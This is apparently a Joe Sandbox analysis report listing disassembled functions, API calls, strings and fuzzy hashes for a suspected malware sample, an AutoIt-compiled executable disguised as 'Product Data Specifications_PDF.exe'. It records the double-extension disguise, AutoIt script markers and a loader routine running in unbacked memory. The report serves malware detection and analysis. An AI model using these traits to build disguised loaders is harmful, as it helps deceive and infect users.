                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                              • String ID: 0SH
                              • API String ID: 3363477735-851180471
                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                              APIs
                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: IsThemeActive$uxtheme.dll
                              • API String ID: 2574300362-3542929980
                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchSleepTranslate
                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                              • API String ID: 1762048999-758534266
                              • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                              • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • __wcsicoll.LIBCMT ref: 00402007
                              • __wcsicoll.LIBCMT ref: 0040201D
                              • __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                              • __wcsicoll.LIBCMT ref: 00402049
                              • _wcscpy.LIBCMT ref: 0040207C
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104), ref: 00428B5B
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Product Data Specifications_PDF.exe$CMDLINE$CMDLINERAW
                              • API String ID: 3948761352-3700435339
                              • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                              • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock$_fseek_wcscpy
                              • String ID: D)E$D)E$FILE
                              • API String ID: 3888824918-361185794
                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                              • __wsplitpath.LIBCMT ref: 0040E41C
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcsncat.LIBCMT ref: 0040E433
                              • __wmakepath.LIBCMT ref: 0040E44F
                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • _wcscpy.LIBCMT ref: 0040E487
                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • _wcscat.LIBCMT ref: 00427541
                              • _wcslen.LIBCMT ref: 00427551
                              • _wcslen.LIBCMT ref: 00427562
                              • _wcscat.LIBCMT ref: 0042757C
                              • _wcsncpy.LIBCMT ref: 004275BC
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                              • String ID: Include$\
                              • API String ID: 3173733714-3429789819
                              • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                              • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                              APIs
                              • _fseek.LIBCMT ref: 0045292B
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452961
                              • __fread_nolock.LIBCMT ref: 00452971
                              • __fread_nolock.LIBCMT ref: 0045298A
                              • __fread_nolock.LIBCMT ref: 004529A5
                              • _fseek.LIBCMT ref: 004529BF
                              • _malloc.LIBCMT ref: 004529CA
                              • _malloc.LIBCMT ref: 004529D6
                              • __fread_nolock.LIBCMT ref: 004529E7
                              • _free.LIBCMT ref: 00452A17
                              • _free.LIBCMT ref: 00452A20
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                              • String ID:
                              • API String ID: 1255752989-0
                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • ImageList_ReplaceIcon.COMCTL32(00938D90,000000FF,00000000), ref: 00410552
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00938D90,000000FF,00000000), ref: 00410552
                               Memory Dump Source
                               • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: the same seven dumps (00400000, 00482000, 00490000, 00491000, 00492000, 004A7000, 004AB000) listed for the first function in this section
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: Default
                              • API String ID: 1579825452-753088835
                              • Opcode ID: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                              • Opcode Fuzzy Hash: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                               Control-flow Graph
                               • Rendered graph of the function starting at 0040F5C0 (executed / not executed basic blocks) not reproduced; raw graph data omitted
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock_fseek_memmove_strcat
                              • String ID: AU3!$EA06
                              • API String ID: 1268643489-2658333250
                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                               Control-flow Graph
                               • Rendered graph of the function starting at 00401100 (executed / not executed basic blocks) not reproduced; raw graph data omitted
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                              • CreatePopupMenu.USER32 ref: 00401204
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                               Control-flow Graph
                               • Rendered graph of the function starting at 004115D7 (executed / not executed basic blocks) not reproduced; raw graph data omitted
                              APIs
                              • _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • std::exception::exception.LIBCMT ref: 00411626
                              • std::exception::exception.LIBCMT ref: 00411640
                              • __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: ,*H$4*H$@fI
                              • API String ID: 615853336-1459471987
                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                               Control-flow Graph
                               • Rendered graph of the function starting at 04004EB0 (executed / not executed basic blocks) not reproduced; raw graph data omitted
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04004F81
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040051A7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                              • Instruction ID: 1b2642848d7560664e3b9f9078f4f021fc65fe28453b99d761064bfbb9b58ef2
                              • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                              • Instruction Fuzzy Hash: 90A1F874E00209EBEB14CFA4C894BEEBBB5BF48304F208559E515BB2C0D775AA81DF95

                               Control-flow Graph
                               • Rendered graph of the function starting at 004102B0 (executed / not executed basic blocks) not reproduced; raw graph data omitted
                              APIs
                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • _wcsncpy.LIBCMT ref: 004102ED
                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • _wcsncpy.LIBCMT ref: 00410340
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                              • String ID: C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 3170942423-1668980472
                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                               Control-flow Graph
                               • Rendered graph of the function starting at 00401250 (executed / not executed basic blocks) not reproduced; raw graph data omitted
                              APIs
                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 3300667738-0
                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpen
                              • String ID: Include$Software\AutoIt v3\AutoIt
                              • API String ID: 1586453840-614718249
